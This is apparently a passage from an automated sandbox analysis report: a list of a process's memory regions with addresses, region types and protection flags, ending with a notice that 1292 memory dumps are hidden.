heap
page read and write
86F8000
heap
page read and write
2FBF000
unkown
page read and write
666000
stack
page read and write
2CFF000
stack
page read and write
21BAE88E000
heap
page read and write
2DC5000
heap
page read and write
85BE000
stack
page read and write
465E000
heap
page read and write
501E000
trusted library allocation
page read and write
21BAF880000
trusted library section
page readonly
463C000
heap
page read and write
23041000
heap
page read and write
21BB4080000
remote allocation
page read and write
21BAEE90000
trusted library allocation
page read and write
8D8B000
heap
page read and write
2271F000
stack
page read and write
86B3000
heap
page read and write
4646000
heap
page read and write
86A7000
heap
page read and write
22ADC000
stack
page read and write
8DBD000
heap
page read and write
4D6D27B000
stack
page read and write
344C000
heap
page read and write
4D6CB7E000
unkown
page readonly
633B000
heap
page read and write
29C0000
trusted library section
page read and write
21BB4080000
remote allocation
page read and write
2BD8000
heap
page read and write
820C000
stack
page read and write
6345000
heap
page read and write
21BB3E51000
heap
page read and write
4641000
heap
page read and write
7393000
heap
page read and write
2CF0000
trusted library allocation
page read and write
2C02000
heap
page read and write
2269D000
stack
page read and write
2D60000
heap
page read and write
46F0000
heap
page read and write
3126000
heap
page read and write
29E4000
trusted library allocation
page read and write
2C1A000
trusted library allocation
page execute and read and write
7FFD000
stack
page read and write
234C0000
unclassified section
page execute and read and write
86A7000
heap
page read and write
31EE000
stack
page read and write
6345000
heap
page read and write
86AF000
heap
page read and write
4677000
heap
page read and write
7252000
heap
page read and write
3020000
heap
page read and write
466B000
heap
page read and write
AC92000
trusted library allocation
page read and write
8160000
heap
page read and write
21BAE813000
heap
page read and write
86A4000
heap
page read and write
4D6D57E000
unkown
page readonly
2BFC000
heap
page read and write
4630000
heap
page read and write
740000
heap
page readonly
6354000
heap
page read and write
4D6D37E000
unkown
page readonly
82A0000
trusted library allocation
page execute and read and write
21BAE720000
heap
page read and write
4672000
heap
page read and write
633E000
heap
page read and write
6340000
heap
page read and write
2BD8000
heap
page read and write
6BE5000
heap
page execute and read and write
4664000
heap
page read and write
86AF000
heap
page read and write
2DFB000
heap
page read and write
490F000
stack
page read and write
21BB3D53000
trusted library allocation
page read and write
2D80000
heap
page read and write
4631000
heap
page read and write
74E0000
trusted library allocation
page read and write
660000
heap
page read and write
21BB3F0A000
heap
page read and write
2C00000
heap
page read and write
469E000
heap
page read and write
21BB3E23000
heap
page read and write
21BAF11A000
heap
page read and write
2DF0000
heap
page read and write
2265D000
stack
page read and write
770000
heap
page read and write
6D4000
heap
page read and write
4B31000
heap
page read and write
302D000
heap
page read and write
4C11000
heap
page read and write
680000
direct allocation
page read and write
2246E000
stack
page read and write
86A3000
heap
page read and write
2D10000
heap
page read and write
2BF2000
heap
page read and write
720C000
heap
page read and write
46AE000
stack
page read and write
858C000
stack
page read and write
4885000
heap
page execute and read and write
2D7C000
stack
page read and write
2D5F000
unkown
page read and write
2B7E000
heap
page read and write
73A7000
heap
page read and write
6D70000
direct allocation
page read and write
7610000
trusted library allocation
page read and write
2BE0000
heap
page read and write
2BEE000
heap
page read and write
6D5000
heap
page read and write
22B5C000
stack
page read and write
4645000
heap
page read and write
4D6D4FE000
stack
page read and write
73D000
stack
page read and write
7467000
trusted library allocation
page read and write
463C000
heap
page read and write
469E000
heap
page read and write
2C22000
heap
page read and write
86AF000
heap
page read and write
7670000
trusted library allocation
page read and write
2BF7000
heap
page read and write
770000
direct allocation
page read and write
8D8E000
heap
page read and write
4647000
heap
page read and write
2C0E000
heap
page read and write
21BB3EFC000
heap
page read and write
86F1000
heap
page read and write
6D4000
heap
page read and write
2DC0000
heap
page read and write
82D0000
heap
page read and write
780000
heap
page read and write
4F74000
trusted library allocation
page read and write
86A7000
heap
page read and write
812C000
stack
page read and write
7560000
trusted library allocation
page read and write
743C000
heap
page read and write
2B68000
heap
page read and write
292E000
stack
page read and write
2C02000
heap
page read and write
76A0000
trusted library allocation
page read and write
22560000
direct allocation
page read and write
2C00000
trusted library allocation
page read and write
A266000
direct allocation
page execute and read and write
4B31000
heap
page read and write
2BEE000
heap
page read and write
465E000
heap
page read and write
2C22000
heap
page read and write
7124000
heap
page read and write
81B0000
trusted library allocation
page read and write
86A7000
heap
page read and write
22BA0000
heap
page read and write
41B000
system
page execute and read and write
4C6F000
stack
page read and write
2D1D000
stack
page read and write
21BB3D00000
trusted library allocation
page read and write
4645000
heap
page read and write
292E000
unkown
page read and write
3008000
heap
page read and write
4F81000
heap
page read and write
2990000
heap
page read and write
312A000
heap
page read and write
730000
direct allocation
page read and write
6F50000
heap
page read and write
234B3000
unclassified section
page execute and read and write
6D5000
heap
page read and write
4D6DF7B000
stack
page read and write
4EB3000
trusted library allocation
page read and write
4D6D97E000
unkown
page readonly
2C30000
heap
page read and write
21BB3D50000
trusted library allocation
page read and write
21BB3CD0000
trusted library allocation
page read and write
867C000
heap
page read and write
2DBE000
heap
page read and write
70F0000
heap
page execute and read and write
86A7000
heap
page read and write
4B80000
heap
page read and write
4F80000
trusted library allocation
page read and write
6D4000
heap
page read and write
32BF000
stack
page read and write
8707000
heap
page read and write
4D6DB7E000
unkown
page readonly
7110000
heap
page read and write
2C00000
heap
page read and write
2D8C000
heap
page read and write
86AF000
heap
page read and write
78E000
stack
page read and write
2C11000
heap
page read and write
2BA8000
heap
page read and write
74E000
stack
page read and write
60F4000
trusted library allocation
page read and write
6312000
heap
page read and write
2C30000
heap
page read and write
81C0000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
6D4000
heap
page read and write
633B000
heap
page read and write
31DD000
heap
page read and write
4651000
heap
page read and write
4647000
heap
page read and write
21BB5000000
heap
page read and write
7100000
trusted library allocation
page read and write
21BB3EF2000
heap
page read and write
2D22000
trusted library allocation
page read and write
45D000
system
page execute and read and write
2C5E000
unkown
page read and write
4B31000
heap
page read and write
4645000
heap
page read and write
22B9E000
stack
page read and write
29D0000
trusted library allocation
page read and write
870E000
heap
page read and write
6333000
heap
page read and write
6E0000
direct allocation
page read and write
6342000
heap
page read and write
6D4000
heap
page read and write
59A9000
trusted library allocation
page read and write
21BAF8C0000
trusted library section
page readonly
4D72000
trusted library allocation
page read and write
4957000
trusted library allocation
page read and write
2C3F000
heap
page read and write
4B31000
heap
page read and write
494E000
stack
page read and write
22D30000
heap
page read and write
550000
heap
page read and write
22C7B000
unclassified section
page execute and read and write
21BAE800000
heap
page read and write
21BB4080000
remote allocation
page read and write
75C0000
trusted library allocation
page read and write
21BAE8BD000
heap
page read and write
9866000
direct allocation
page execute and read and write
22FAC000
heap
page read and write
21BAE8A0000
heap
page read and write
699F000
remote allocation
page execute and read and write
430000
heap
page read and write
2C46000
heap
page read and write
2C4F000
heap
page read and write
21BB3DB0000
trusted library allocation
page read and write
6344000
heap
page read and write
86B2000
heap
page read and write
464E000
heap
page read and write
750000
direct allocation
page read and write
73E3000
heap
page read and write
2CF3000
trusted library allocation
page execute and read and write
22EBA000
heap
page read and write
7F7B1000
trusted library allocation
page execute read
2E30000
heap
page execute and read and write
7650000
trusted library allocation
page read and write
2D25000
trusted library allocation
page execute and read and write
2954000
heap
page read and write
7A0000
heap
page read and write
2CDD000
stack
page read and write
3443000
heap
page read and write
2C22000
heap
page read and write
29ED000
heap
page read and write
760000
direct allocation
page read and write
4649000
heap
page read and write
6D4000
heap
page read and write
4F81000
heap
page read and write
60F0000
trusted library allocation
page read and write
6D0000
direct allocation
page read and write
633B000
heap
page read and write
463E000
heap
page read and write
4651000
heap
page read and write
4631000
heap
page read and write
6D5000
heap
page read and write
85CD000
heap
page read and write
4F8C000
trusted library allocation
page read and write
2C02000
heap
page read and write
4B31000
heap
page read and write
2C02000
heap
page read and write
22E41000
heap
page read and write
4B73000
heap
page read and write
21BAE929000
heap
page read and write
21BAF15A000
heap
page read and write
2C12000
heap
page read and write
4D6CA7E000
stack
page read and write
632F000
heap
page read and write
4D7F000
stack
page read and write
6329000
heap
page read and write
2C22000
heap
page read and write
2C3C000
heap
page read and write
4651000
heap
page read and write
2F30000
heap
page read and write
8634000
heap
page read and write
5991000
trusted library allocation
page read and write
2C12000
heap
page read and write
6336000
heap
page read and write
6D4000
heap
page read and write
4D6D17E000
unkown
page readonly
824D000
stack
page read and write
2CE0000
trusted library allocation
page read and write
21BAE895000
heap
page read and write
4F79000
trusted library allocation
page read and write
2AB5000
heap
page read and write
466F000
heap
page read and write
30C0000
heap
page read and write
2E24000
heap
page read and write
709E000
stack
page read and write
2954000
heap
page read and write
8709000
heap
page read and write
2C22000
heap
page read and write
2C07000
heap
page read and write
32FE000
stack
page read and write
473000
system
page execute and read and write
4EDA000
trusted library allocation
page read and write
2299C000
stack
page read and write
634D000
heap
page read and write
2E5C000
heap
page read and write
3020000
heap
page readonly
4F81000
heap
page read and write
7373000
heap
page read and write
465C000
heap
page read and write
6A0000
direct allocation
page read and write
634D000
heap
page read and write
4639000
heap
page read and write
29F0000
heap
page read and write
4647000
heap
page read and write
4630000
heap
page read and write
2954000
heap
page read and write
465C000
heap
page read and write
2C0E000
heap
page read and write
6328000
heap
page read and write
2DB3000
heap
page read and write
There are 1292 hidden memdumps, click here to show them.